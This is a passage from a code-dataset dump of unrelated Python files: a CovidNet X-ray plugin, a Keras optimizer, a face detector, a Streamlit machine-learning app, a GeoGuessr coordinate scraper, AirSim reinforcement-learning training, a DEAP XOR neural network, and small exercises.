f:\n self.class_names.append(row[:-1])\n\n def getProgressSteps(self, eltCount=1):\n # Function returning the number of progress steps for this process\n # This is handled by the main progress bar of Ikomia application\n return 3\n\n def run(self):\n # Core function of your process\n # Call beginTaskRun for initialization\n self.beginTaskRun()\n\n # Forward input image\n self.forwardInputImage(0, 0)\n\n # Get input :\n input_img = self.getInput(0)\n src_image = input_img.getImage()\n\n if src_image.ndim == 2:\n color_image = cv2.cvtColor(src_image, cv2.COLOR_GRAY2RGB)\n else:\n color_image = src_image\n\n h = color_image.shape[0]\n w = color_image.shape[1]\n\n # Step progress bar:\n self.emitStepProgress()\n \n # Run prediction\n prediction = self.covid_model.predict(color_image)\n\n # Step progress bar:\n self.emitStepProgress()\n\n # Set graphics output\n graphics_output = self.getOutput(1)\n graphics_output.setNewLayer(\"CovidNet\")\n graphics_output.setImageIndex(0)\n class_index = prediction.argmax(axis=1)[0]\n msg = self.class_names[class_index] + \": {:.3f}\".format(prediction[0][class_index]) \n graphics_output.addText(msg, 0.05*w, 0.05*h)\n\n # Init numeric output\n numeric_ouput = self.getOutput(2)\n numeric_ouput.clearData()\n numeric_ouput.setOutputType(PyCore.NumericOutputType.TABLE)\n numeric_ouput.addValueList(prediction.flatten().tolist(), \"Probability\", self.class_names)\n \n # Step progress bar:\n self.emitStepProgress()\n\n # Call endTaskRun to finalize process\n self.endTaskRun()\n\n\n# --------------------\n# - Factory class to build process object\n# - Inherits PyDataProcess.CProcessFactory from Ikomia API\n# --------------------\nclass CovidNetProcessFactory(PyDataProcess.CProcessFactory):\n\n def __init__(self):\n PyDataProcess.CProcessFactory.__init__(self)\n # Set process information as string here\n self.info.name = \"CovidNet\"\n self.info.shortDescription = \"A tailored Deep Convolutional Neural Network Design \" \\\n \"for detection of COVID-19 cases from chest radiography images.\"\n self.info.description = \"The COVID-19 pandemic continues to have a devastating effect on the health \" \\\n \"and well-being of the global population. A critical step in the fight against \" \\\n \"COVID-19 is effective screening of infected patients, with one of the key screening \" \\\n \"approaches being radiological imaging using chest radiography. 
It was found in early \" \\\n \"studies that patients present abnormalities in chest radiography images that are characteristic \" \\\n \"of those infected with COVID-19. Motivated by this, a number of artificial intelligence (AI) \" \\\n \"systems based on deep learning have been proposed and results have been shown to be quite promising \" \\\n \"in terms of accuracy in detecting patients infected with COVID-19 using chest radiography images. \" \\\n \"However, to the best of the authors’ knowledge, these developed AI systems have been closed source \" \\\n \"and unavailable to the research community for deeper understanding and extension, and unavailable \" \\\n \"for public access and use. Therefore, in this study we introduce COVID-Net, a deep convolutional \" \\\n \"neural network design tailored for the detection of COVID-19 cases from chest radiography images \" \\\n \"that is open source and available to the general public. We also describe the chest radiography dataset \" \\\n \"leveraged to train COVID-Net, which we will refer to as COVIDx and is comprised of 16,756 chest \" \\\n \"radiography images across 13,645 patient cases from two open access data repositories. \" \\\n \"Furthermore, we investigate how COVID-Net makes predictions using an explainability method \" \\\n \"in an attempt to gain deeper insights into critical factors associated with COVID cases, \" \\\n \"which can aid clinicians in improved screening. By no means a production-ready solution, \" \\\n \"the hope is that the open access COVID-Net, along with the description on constructing \" \\\n \"the open source COVIDx dataset, will be leveraged and build upon by both researchers and \" \\\n \"citizen data scientists alike to accelerate the development of highly accurate yet practical \" \\\n \"deep learning solutions for detecting COVID-19 cases and accelerate treatment of those \" \\\n \"who need it the most.\"\n # relative path -> as displayed in Ikomia application process tree\n self.info.path = \"Plugins/Python/Detection\"\n self.info.version = \"1.0.0\"\n self.info.iconPath = \"icon/icon.png\"\n self.info.authors = \"Linda Wang, Alexander Wong\"\n self.info.article = \"COVID-Net: A Tailored Deep Convolutional Neural Network Design for Detection \" \\\n \"of COVID-19 Cases from Chest Radiography Images\"\n self.info.journal = \"\"\n self.info.year = 2020\n self.info.license = \"GNU Affero General Public License 3.0.\"\n self.info.documentationLink = \"https://arxiv.org/pdf/2003.09871.pdf\"\n self.info.repository = \"https://github.com/lindawangg/COVID-Net\"\n self.info.keywords = \"covid-19,coronavirus,x-ray,radiography,chest,lung,dnn\"\n\n\n def create(self, param=None):\n # Create process object\n return CovidNetProcess(self.info.name, param)\n","sub_path":"CovidNet/CovidNet_process.py","file_name":"CovidNet_process.py","file_ext":"py","file_size_in_byte":8190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"602714456","text":"from keras.optimizers import Optimizer\nimport keras.backend as K\nfrom keras.legacy import interfaces\n\n\nclass Santa(Optimizer):\n \"\"\"\n Euler implementation of Santa optimization algorithm,\n Adapted from theano implementation of authors\n \"\"\"\n\n def __init__(self, lr, exploration, rho=0.95,\n anne_rate=0.5, epsilon=1e-8, **kwargs):\n # default value for clipping is 'clip_norm = 5'\n if 'clipnorm' not in kwargs and 'clipvalue' not in kwargs:\n kwargs['clipnorm'] = 5\n\n super(Santa, self).__init__(**kwargs)\n with 
K.name_scope(self.__class__.__name__):\n self.iterations = K.variable(0, dtype='float32', name='iterations')\n self.lr = K.variable(lr, name='lr')\n\n self.exploration = K.variable(exploration, name='exploration', dtype='float32')\n\n # anne_rate -> η\n self.anne_rate = K.variable(anne_rate, name='anne_rate')\n if epsilon is None:\n epsilon = K.epsilon()\n self.epsilon = epsilon\n # rho -> σ\n self.rho = rho\n\n @interfaces.legacy_get_updates_support\n def get_updates(self, loss, params):\n # grads -> f_tilda\n grads = self.get_gradients(loss, params)\n\n ###\n ### Removed part seems to be related theano specifically\n ###\n\n # i = theano.shared(numpy_floatX(0.))\n i_t = self.iterations + 1\n\n # Exploration condition (CHANGED!)\n should_explore = K.cast(K.less(i_t, self.exploration), K.floatx())\n\n # Inverse temperature β\n b_t = K.pow(i_t, self.anne_rate)\n\n ms = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]\n vs = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]\n als = [K.ones(K.int_shape(p), dtype=K.dtype(p)) * .5 for p in params]\n\n for p, g, m, v, a in zip(params, grads, ms, vs, als):\n # m = K.variable(p.get_value() * 0.)\n # v = K.variable(p.get_value() * 0.)\n # alpha = K.variable(K.ones(p.get_value().shape) * .5)\n\n # In Exploitation value is not updated, (1 / 2) not found?\n a_t = a + should_explore * (K.pow(m, 2) - self.lr / b_t)\n\n # (1 / N^2) not found? (probably normalization factor...)\n v_t = self.rho * v + (1. - self.rho) * K.pow(g, 2)\n\n # pcder -> 1 / g_t\n pcder = K.sqrt(K.sqrt(v_t) + self.epsilon)\n\n # eps -> ζ : standard normal random vector\n # eps = K.random_normal(p.get_value().shape, mean=0.0, stddev=1.0)\n eps = K.random_normal(K.int_shape(p), mean=0.0, stddev=1.0)\n\n # m_t -> u_t\n # (1 - g_t-1 / g_t) term omitted for complexity\n # g_t-1 term is replaced with a (not constant?!) self.nframes\n # 1 instead of (v_t / self.nframes) since it can be constant\n m_t = (1. 
- a_t) * m - self.lr * g / pcder + should_explore * \\\n K.sqrt((2 * self.lr / b_t) * v_t) * eps\n\n # p_t -> θ_t\n p_t = p + m_t / pcder\n\n self.updates.append(K.update(m, m_t))\n self.updates.append(K.update(v, v_t))\n self.updates.append(K.update(p, p_t))\n # self.updates.append(K.update(a, a_t))\n # Adam implementation did not update the iteration counter...\n # self.updates.append(K.update(i, i_t))\n\n return self.updates\n\n def get_config(self):\n # lr, exploration, rho=0.95,\n # anne_rate=0.5, epsilon=1e-8\n config = {\n 'lr': float(K.get_value(self.lr)),\n 'exploration': int(K.get_value(self.exploration)),\n 'rho': self.rho,\n 'anne_rate': float(K.get_value(self.anne_rate)),\n 'epsilon': self.epsilon\n }\n # clip_norm=5\n base_config = super(Santa, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n","sub_path":"Santa.py","file_name":"Santa.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"437839572","text":"#!/usr/bin/python2\nimport sys\nimport cv2\nimport numpy\n\n# Get user supplied values\ncascPath = sys.argv[1]\n\n# Create the haar cascade\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\n# Read the image\nvideo_capture = cv2.VideoCapture(0)\nret, image = video_capture.read()\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# Detect faces in the image\nfaces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30, 30),\n flags = cv2.CASCADE_SCALE_IMAGE\n)\n\n#print \"Found {0} faces!\".format(len(faces))\n\n# Draw a rectangle around the faces\nfor (x, y, w, h) in faces:\n cv2.rectangle(image, (x, y), (x+w, y+h), (255, 36, 36), 5)\n\ncv2.imwrite(\"processed_shot.jpg\", image)\n\ncv2.waitKey(0)\n","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"80009903","text":"'''\nConsider that the human tower is to be performed on a stage and the stage has a maximum weight limit.\n\nWrite a python program to find the maximum number of people at the base level such that the total weight of tower does not exceed the maximum weight limit of the stage.\n\nAssume that:\n1. Each person weighs 50 kg\n2. There will always be odd number of men at the base level of the human tower.\n'''\n\n# Solution\n\n#PF-Exer-32\n\ndef human_pyramid(no_of_people):\n if(no_of_people==1):\n return 1*(50)\n else:\n return no_of_people*(50)+human_pyramid(no_of_people-2)\n \ndef find_maximum_people(max_weight):\n no_of_people=1\n while human_pyramid(no_of_people) <= max_weight :\n no_of_people += 2 \n #write your logic here. 
You may invoke recursive function human_pyramid() wherever applicable \n return no_of_people-2\n\n#Provide different values for max_weight and test your program\nmax_people=find_maximum_people(1050)\nprint(max_people)\n","sub_path":"Programming Fundamentals using Python/Day 6/Exercises/Exercise 32: Collaborative Exercise - Level 2.py","file_name":"Exercise 32: Collaborative Exercise - Level 2.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"291430574","text":"# Core packages\nimport streamlit as st \n# Images packages\nfrom PIL import Image\n# EDA packages\nimport pandas as pd \nimport numpy as np\n# Data visualisation packages\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib\n# Machine Leaning Models\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\n\nimg = Image.open('mutemaEnterprises.jpg')\nst.set_page_config(page_title='Datasets and Machine Learning Models Analyzer',page_icon = img)\n\ndef main():\n\tdef modelsf():\n\t\tml_models = ['Linear Regression','Logistic Regression','SVM','KNN','Random Forest']\n\t\tselected_model = st.sidebar.selectbox('Machine Learning Models',ml_models)\n\t\tif selected_model == 'Linear Regression':\n\t\t\tst.write('''# Linear Regression''')\n\t\t\ttry:\n\t\t\t\tclf = LinearRegression()\n\t\t\t\tclf.fit(X_train,y_train)\n\t\t\t\taccuracy = clf.score(X_test,y_test)\n\t\t\t\tst.write('ACCURACY is {}'.format(accuracy))\n\t\t\n\t\t\texcept Exception as e:\n\t\t\t\tst.error(\n\t\t\t\t\t'Selected algorithm does not support inserted dataset \\n'\n\t\t\t\t\t'The data inserted is not compatible with the algorithm selected for example you have selected a regression algorithm '\n\t\t\t\t\t'but your dataset include strings which cannot be parsed to floats or integers thus since the regression algorithm works '\n\t\t\t\t\t'with numbers and not other datatypes, it will give an error please select another algorithm................. \\n'\n\t\t\t\t\t'PLEASE SELECT ANOTHER ALGORITHM')\n\n\t\telif selected_model == 'Logistic Regression':\n\t\t\tst.write('''# Logistic Regression''')\n\t\t\ttry:\n\t\t\t\tclf = LogisticRegression(random_state=rndm_state)\n\t\t\t\tclf.fit(X_train,y_train)\n\t\t\t\taccuracy = clf.score(X_test,y_test)\n\t\t\t\tst.write('ACCURACY is {}'.format(accuracy))\n\t\t\n\t\t\texcept Exception as e:\n\t\t\t\tst.error(\n\t\t\t\t\t'Selected algorithm does not support inserted dataset \\n'\n\t\t\t\t\t'The data inserted is not compatible with the algorithm selected for example you have selected a regression algorithm '\n\t\t\t\t\t'but your dataset include strings which cannot be parsed to floats or integers thus since the regression algorithm works '\n\t\t\t\t\t'with numbers and not other datatypes it will give an error please select another algorithm.......................... 
\\n'\n\t\t\t\t\t'PLEASE SELECT ANOTHER ALGORITHM.')\n\t\n\t\telif selected_model == 'SVM':\n\t\t\tst.write('''# SVM''')\n\t\t\ttry:\n\t\t\t\tC = st.sidebar.slider('C',0.01,10.0)\n\t\t\t\tclf = SVC(C=C)\n\t\t\t\tclf.fit(X_train,y_train)\n\t\t\t\taccuracy = clf.score(X_test,y_test)\n\t\t\t\tst.write('ACCURACY is {}'.format(accuracy))\n\t\t\n\t\t\texcept Exception as e:\n\t\t\t\tst.error(\n\t\t\t\t\t'Selected algorithm does not support inserted dataset \\n'\n\t\t\t\t\t'The data inserted is not compatible with the algorithm selected for example you have selected a regression algorithm '\n\t\t\t\t\t'but your dataset include strings which cannot be parsed to floats or integers thus since the regression algorithm works '\n\t\t\t\t\t'with numbers and not other datatypes it will give an error please select another algorithm.......................... \\n'\n\t\t\t\t\t'PLEASE SELECT ANOTHER ALGORITHM.')\n\t\t\t\n\t\telif selected_model == 'KNN':\n\t\t\tst.write('''# KNN''')\n\t\t\ttry:\n\t\t\t\tK = st.sidebar.slider('K',1,15)\n\t\t\t\tclf = KNeighborsClassifier(n_neighbors=K)\n\t\t\t\tclf.fit(X_train,y_train)\n\t\t\t\taccuracy = clf.score(X_test,y_test)\n\t\t\t\tst.write('ACCURACY is {}'.format(accuracy))\n\t\t\n\t\t\texcept Exception as e:\n\t\t\t\tst.error(\n\t\t\t\t\t'Selected algorithm does not support inserted dataset \\n'\n\t\t\t\t\t'The data inserted is not compatible with the algorithm selected for example you have selected a regression algorithm '\n\t\t\t\t\t'but your dataset include strings which cannot be parsed to floats or integers thus since the regression algorithm works '\n\t\t\t\t\t'with numbers and not other datatypes it will give an error please select another algorithm.......................... \\n'\n\t\t\t\t\t'PLEASE SELECT ANOTHER ALGORITHM.')\t\n\n\t\telif selected_model == 'Random Forest':\n\t\t\tst.write('''Random Forest''')\n\t\t\ttry:\n\t\t\t\tmax_depth = st.sidebar.slider('max-depth',2,15)\n\t\t\t\tn_estimators = st.sidebar.slider('n_estimators',1,100)\n\t\t\t\tclf = RandomForestClassifier(n_estimators = n_estimators,max_depth = max_depth,random_state=rndm_state)\n\t\t\t\tclf.fit(X_train,y_train)\n\t\t\t\taccuracy = clf.score(X_test,y_test)\n\t\t\t\tst.write('ACCURACY is {}'.format(accuracy))\n\t\t\n\t\t\texcept Exception as e:\n\t\t\t\tst.error(\n\t\t\t\t\t'Selected algorithm does not support inserted dataset \\n'\n\t\t\t\t\t'The data inserted is not compatible with the algorithm selected for example you have selected a regression algorithm '\n\t\t\t\t\t'but your dataset include strings which cannot be parsed to floats or integers thus since the regression algorithm works '\n\t\t\t\t\t'with numbers and not other datatypes it will give an error please select another algorithm.......................... 
\\n'\n\t\t\t\t\t'PLEASE SELECT ANOTHER ALGORITHM.')\n\n\tdef explanatory_data_analysis():\n\t\t# Show Dataset\n\t\tif st.checkbox('Show Dataset'):\n\t\t\tnumber = st.number_input('Number of rows to view',1)\n\t\t\tst.dataframe(df.head(number))\n\t\tif st.checkbox('Show number of rows and columns'):\n\t\t\tst.write(f'Rows: {df.shape[0]}')\n\t\t\tst.write(f'Columns: {df.shape[1]}')\n\t\t# if st.checkbox('Value Count'):\n\t\tif st.checkbox('Show Value Counts of Target Columns'):\n\t\t\tst.write(df.iloc[:,-1].value_counts())\n\t\t# Show Columns\n\t\tif st.checkbox('Column Labels'):\n\t\t\tst.write(df.columns)\n\t\t# Show Data Types \n\t\tif st.checkbox('Data Types'):\n\t\t\tst.write(df.dtypes)\n\t\t# Selected Columns\n\t\tif st.checkbox('Select multiple columns'):\n\t\t\tall_columns = df.columns.tolist()\n\t\t\tselected_columns = st.multiselect('Select Columns',all_columns)\n\t\t\tselected_columns_df = df[selected_columns]\n\t\t\tif len(selected_columns) > 0:\n\t\t\t\tst.dataframe(selected_columns_df)\n\t\t# Show Summary\n\t\tif st.checkbox('Summary'):\n\t\t\tst.write(df.describe().T)\n\n\n\tdef visualisation():\n\t\t# Plot and Visualisation\n\t\t# Correlation\n\t\t# Seaborn Plot\n\t\tif st.checkbox('Show Correlation Matrix with Heatmap'):\n\t\t\tif st.button('Generate Correlation Matrix'):\n\t\t\t\tst.write('### Heatmap')\n\t\t\t\tfig, ax = plt.subplots(figsize=(10,10))\n\t\t\t\tst.write(sns.heatmap(df.corr(), annot=True,linewidths=0.5))\n\t\t\t\tst.pyplot(fig)\n\n\t\t# Pie Chart\n\t\tif st.checkbox('Pie Chart Plot of Target Columns'):\n\t\t\tif st.button('Generate Pie Plot'):\n\t\t\t\tst.success('Generating a Pie Chart Plot')\n\t\t\t\tst.write(df.iloc[:,-1].value_counts().plot.pie(autopct=\"%1.1f%%\"))\n\t\t\t\tst.pyplot()\n\t\t# Customizable Plot\n\t\tplot_types = ['area','bar','line','hist','box','kde']\n\t\ttype_of_plot = st.selectbox('Select Type of Plot',plot_types)\n\t\tall_cols = df.columns.tolist()\n\t\tselected_cols = st.multiselect('Select Columns to Plot',all_cols)\n\t\tcust_data = df[selected_cols]\n\t\tif st.button('Generate Plot'):\n\t\t\tst.success('Generating Plot of {} for the selected columns which are {}'.format(type_of_plot,selected_cols))\n\t\t\tif type_of_plot == 'area':\n\t\t\t\tst.area_chart(cust_data)\n\t\t\telif type_of_plot == 'bar':\n\t\t\t\tst.bar_chart(cust_data)\n\t\t\telif type_of_plot == 'line':\n\t\t\t\tst.line_chart(cust_data)\n\n\t\t\telif type_of_plot:\n\t\t\t\tcust_plot = cust_data.plot(kind = type_of_plot)\n\t\t\t\tst.write(cust_plot)\n\t\t\t\tst.pyplot()\n\n\t\t# Count Plot\t \n\t\tif st.checkbox('Value Counts Plot'):\n\t\t\tst.text('Value Counts by Target')\n\t\t\tall_column_name = df.columns.tolist()\n\t\t\tprimary_col = st.selectbox('Primary Columns to group by',all_column_name)\t\n\t\t\tselected_column_name = st.multiselect('Select Column',all_column_name)\n\t\t\tif st.button('Generate Value Counts Plot'):\n\t\t\t\tst.success('Generating Plot')\n\t\t\t\tif selected_column_name:\n\t\t\t\t\tvalue_count_plot = df.groupby(primary_col)[selected_column_name].count()\n\t\t\t\telse:\n\t\t\t\t\tvalue_count_plot = df.iloc[:,-1].value_counts()\n\t\t\t\tst.write(value_count_plot.plot(kind = 'bar'))\n\t\t\t\tst.pyplot()\n\n\n\tst.set_option('deprecation.showPyplotGlobalUse', False)\n\tmenu = ['Exploratory Data Analysis','Feature Engineering','Machine Learning Models','About']\n\tchoice = st.sidebar.selectbox('Main Menu',menu)\n\tif choice == 'Exploratory Data Analysis':\n\t\tst.write('''# Exploratory Data Analysis''')\n\t\tfile_formats_types = 
['csv','xlsx','json','txt']\n\t\tdatafile_format = st.selectbox('Dataset File Format',file_formats_types)\n\t\tdata_file = st.file_uploader('Upload',type = [datafile_format])\t\n\t\tif data_file is not None:\n\t\t\tif datafile_format == 'csv':\n\t\t\t\tdf = pd.read_csv(data_file)\n\t\t\telif datafile_format == 'xlsx':\n\t\t\t\tdf = pd.read_excel(data_file)\n\t\t\telif datafile_format == 'txt':\n\t\t\t\tdf = pd.read_csv(data_file)\n\t\t\telif datafile_format == 'json':\n\t\t\t\tdf = pd.read_json(data_file)\n\t\t\telse:\n\t\t\t\tst.info('Invalid Format')\n\t\t\texplanatory_data_analysis()\n\n\telif choice == 'Feature Engineering':\n\t\tst.write('''# Feature Engineering''')\n\t\tfile_formats_types = ['csv','xlsx','json','txt']\n\t\tdatafile_format = st.selectbox('Dataset File Format',file_formats_types)\n\t\tdata_file = st.file_uploader('Upload',type = [datafile_format])\t\n\t\tif data_file is not None:\n\t\t\tif datafile_format == 'csv':\n\t\t\t\tdf = pd.read_csv(data_file)\n\t\t\telif datafile_format == 'xlsx':\n\t\t\t\tdf = pd.read_excel(data_file)\n\t\t\telif datafile_format == 'txt':\n\t\t\t\tdf = pd.read_csv(data_file)\n\t\t\telif datafile_format == 'json':\n\t\t\t\tdf = pd.read_json(data_file)\n\t\t\telse:\n\t\t\t\tst.info('Invalid Format')\n\t\t\tvisualisation()\n\n\telif choice == 'Machine Learning Models':\n\t\tst.write('''# Machine Learning Models''')\n\t\tfile_formats_types = ['csv','xlsx','json','txt']\n\t\tdatafile_format = st.selectbox('Dataset File Format',file_formats_types)\n\t\tdata_file = st.file_uploader('Upload',type = [datafile_format])\t\n\t\tif data_file is not None:\n\t\t\tif datafile_format == 'csv':\n\t\t\t\tdf = pd.read_csv(data_file)\n\t\t\telif datafile_format == 'xlsx':\n\t\t\t\tdf = pd.read_excel(data_file)\n\t\t\telif datafile_format == 'txt':\n\t\t\t\tdf = pd.read_csv(data_file)\n\t\t\telif datafile_format == 'json':\n\t\t\t\tdf = pd.read_json(data_file)\n\t\t\telse:\n\t\t\t\tst.info('Invalid Format')\n\t\t\tX = df.iloc[:,0:-1]\n\t\t\ty = df.iloc[: , -1]\n\t\t\ttst_sz = st.sidebar.slider('Test Size',1,100)\n\t\t\trndm_state = st.sidebar.slider('Random State')\n\t\t\tX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=tst_sz, random_state=rndm_state)\n\t\t\tmodelsf()\n\n\telif choice == 'About':\n\t\tst.write('''# About''')\n\t\tst.write(\"\"\"\n\t\t# HCT204-Artificial Intelligence CTHSC 2021 Level 2.2 Project\n\n\t\tThis project was developed by Takudzwa Mutema, a student at the University of Zimbabwe currently studying for a Computer\n\t\tScience degree (CTHSC). This web application helps to automate exploratory data analysis, feature engineering and \n\t\tmachine learning model training, returning the accuracy, which may help in choosing a more suitable model for a given dataset,\n\t\tthat is, a model that gives higher accuracy. The web application was developed using Python. It allows a user to insert a dataset\n\t\tin a format that is accepted by the web app (csv, txt, json, xlsx). After uploading a dataset one can experiment with it using the different\n\t\tdata analysis options supported and graph plotting. If a dataset is already prepared for model training, one can use the web app to find\n\t\twhich model is more appropriate by looking at the accuracy.\n\n\t\t# Below is the Question which the web application tried to answer\n\n\t\tCreate a website using python. The site should provide a platform whereby\n\t\tusers should be able to upload their data sets. State the data formats that you\n\t\tsupport on that site. 
Lead the user through a tutorial process whereby a user is\n\t\tsupposed to do Exploratory data analysis and feature engineering. After the\n\t\tExploratory Data analysis and feature engineering stage, the user is supposed\n\t\tto pick any one of the machine learning models that you support on your\n\t\tplatform. If a user picks a wrong machine learning model the system should\n\t\tgive an informative response. The user must also be given a choice to compare\n\t\taccuracy\n\n\t\temail-takudzwamutema5@gmail.com\n\t\t\"\"\")\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129081437","text":"from selenium import webdriver\r\nimport time\r\n\r\n\r\ndef GeoCoordinates(URL):\r\n z = 0\r\n try:\r\n while z <= 10:\r\n z += 1\r\n coordinates = []\r\n acoordinates = []\r\n chrome_path = r\"C:\\Users\\Ericlameguy\\Desktop\\chromedriver_win32 (1)\\chromedriver.exe\"\r\n driver = webdriver.Chrome(chrome_path)\r\n driver.get(URL)\r\n html = driver.execute_script(\"return document.documentElement.innerHTML;\")\r\n\r\n newhtml = html.split(\"https://maps.google.com/maps/@\", 1)[1]\r\n coordinates.append(float(newhtml.split(',')[0]))\r\n coordinates.append(float(newhtml.split(',')[1]))\r\n\r\n\r\n print(coordinates)\r\n except IndexError:\r\n print(\"I N D E X ERROR !!! \")\r\n time.sleep(100)\r\n\r\n\r\n\r\nGeoCoordinates(\"https://geoguessr.com/world/play\")","sub_path":"NoHeadless.py","file_name":"NoHeadless.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"166967791","text":"a=0\nfor x in range(1,101):\n a += x\nprint(\"The sum of the first\", x, \"numbers is\", a)\n\nb = 0\nc = 1\nwhile c < 1000:\n b +=1\n c = c*b\n\nprint(\"The loop ran\", b, \"times, the product was\", c)\n\nahm = 0\nwhile ahm != 12:\n ahm = int(input(\"What is 3*4? 
\\n\"))\nprint(\"Correct, the answer was\", ahm)\n","sub_path":"1.semester/ITGK/Øvinger/Øving 3/merløkker.py","file_name":"merløkker.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"26129361","text":"\n\nfrom xai.brain.wordbase.nouns._jackal import _JACKAL\n\n#class header\nclass _JACKALS(_JACKAL, ):\n\tdef __init__(self,): \n\t\t_JACKAL.__init__(self)\n\t\tself.name = \"JACKALS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"jackal\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_jackals.py","file_name":"_jackals.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"312596095","text":"from baselines import deepq\nfrom baselines.common.atari_wrappers_deprecated import wrap_dqn, ScaledFloatFrame\nimport baselines.AirSimDiscPhys as AirSimDiscPhys\nfrom baselines.AirSimDisc import AirSimDisc\nfrom baselines.AirSimEnvFollow import AirSimEnv\nfrom baselines.AirSimPhysFollow import AirSimPhys\n\ndef main():\n env = AirSimPhys()\n #env = AirSimDisc()\n #env = AirSimDiscPhys.AirSimEnv()\n #env = ScaledFloatFrame(wrap_dqn(env))\n model = deepq.models.cnn_to_mlp_custom(\n convs=[(32, 8, 4), (64, 4, 2), (64, 3, 1)],\n hiddens=[4096, 4096, 4096],\n dueling=True\n )\n # 2,000,000 original\n act = deepq.learn(\n env,\n q_func=model,\n lr=1e-4,\n max_timesteps=1000000,\n buffer_size=1000,\n exploration_fraction=0.1,\n exploration_final_eps=0.01,\n train_freq=4,\n checkpoint_freq=1000,\n learning_starts=10000,\n target_network_update_freq=1000,\n gamma=0.99,\n prioritized_replay=True\n )\n act.save(\"airsim_model.pkl\")\n env.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"baselines/deepq/experiments/airsim/train_airsim.py","file_name":"train_airsim.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"358502968","text":"import numpy as np\nimport random\nfrom deap import algorithms, base, creator, tools\n#this script uses DEAP library to train a fully-connected neural network to solve the 'XOR' problem\n#XOR definition: (0,0)->0, (1,0)->1, (0,1)->1, (1,1)->0\n\n#activation function for neural network\ndef sigmoid(z,deriv):\n if(deriv):\n # derivative expressed in terms of the sigmoid output z\n return z*(1-z)\n\n return 1/(1+np.exp(-z))\n\n#evaluates each set of weights based on performance for XOR\ndef evalWeights(individual):\n #holds all possible inputs (including bias)\n possibleValues = np.matrix([[0,1,0,1],\n [0,0,1,1],\n [1,1,1,1]])\n\n idealMatrix = np.matrix([[0],[1], [1], [0]])\n\n #holds weights by which inputs will be multiplied\n weightsMatrix = np.matrix([[individual[0],individual[2], individual[6]],\n [individual[1],individual[3],individual[7]],\n [0,0,1]])\n\n #multiplies inputs by weights to yield first hidden layer in neural network\n layer1 = sigmoid((np.dot(weightsMatrix,possibleValues)), False)\n\n #holds the second set of weights, by which hidden layer will be multiplied\n weightsMatrix2 = np.matrix([[individual[5], individual[4], individual[8]]])\n\n #holds output of neural networks\n outputMatrix = sigmoid(np.dot(weightsMatrix2,layer1), False)\n\n #compares output to ideal output to assign fitness\n fit1 = (outputMatrix[0,0])**2\n fit2 = (outputMatrix[0,1]-1)**2\n fit3 = (outputMatrix[0,2]-1)**2\n fit4 = (outputMatrix[0,3])**2\n\n fitness = fit1+fit2+fit3+fit4\n\n return (fitness,)\n\n\n#configures all properties of DEAP 
library\ncreator.create(\"FitnessMin\", base.Fitness, weights = (-1.0,))\ncreator.create(\"Individual\", list, fitness = creator.FitnessMin)\ntb = base.Toolbox()\ntb.register(\"floatAttribute\", random.uniform,-1,1)\ntb.register(\"individual\", tools.initRepeat, creator.Individual, tb.floatAttribute, n=9)\ntb.register(\"population\", tools.initRepeat, list, tb.individual, n = 200)\ntb.register(\"evaluate\", evalWeights)\ntb.register(\"mate\", tools.cxTwoPoint)\ntb.register(\"mutate\", tools.mutGaussian, mu=0.0, sigma=0.2, indpb = 0.05)\ntb.register(\"select\", tools.selTournament, tournsize = 3)\ntb.register(\"map\", map)\n\n#creates initial population and evolves it based on fitness\ncxpb , mutpb, ngen = .05, .05, 400\npop = tb.population()\npop = algorithms.eaSimple(pop,tb,cxpb,mutpb,ngen)\n\nweightsList = pop[0][0]\n\ndef defineXOR(x,y):\n #checks to ensure proper input for function\n if( (x!=0 and x!=1) or (y!=0 and y!=1)):\n return \"Please input either a 1 or 0 for x and y.\"\n\n #input values\n possibleValues = np.matrix([[x],\n [y],\n [1]])\n idealMatrix = np.matrix([[0],[1], [1], [0]])\n\n #first weights matrix\n weightsMatrix = np.matrix([[weightsList[0],weightsList[2], weightsList[6]],\n [weightsList[1],weightsList[3],weightsList[7]],\n [0,0,1]])\n\n #values for first hidden layer\n layer1 = sigmoid((np.dot(weightsMatrix,possibleValues)),False)\n\n #second weights matrix\n weightsMatrix2 = np.matrix([[weightsList[5], weightsList[4], weightsList[8]]])\n\n #output value\n outputMatrix = sigmoid(np.dot(weightsMatrix2,layer1), False)\n\n if outputMatrix >= .5:\n return True\n if outputMatrix < .5:\n return 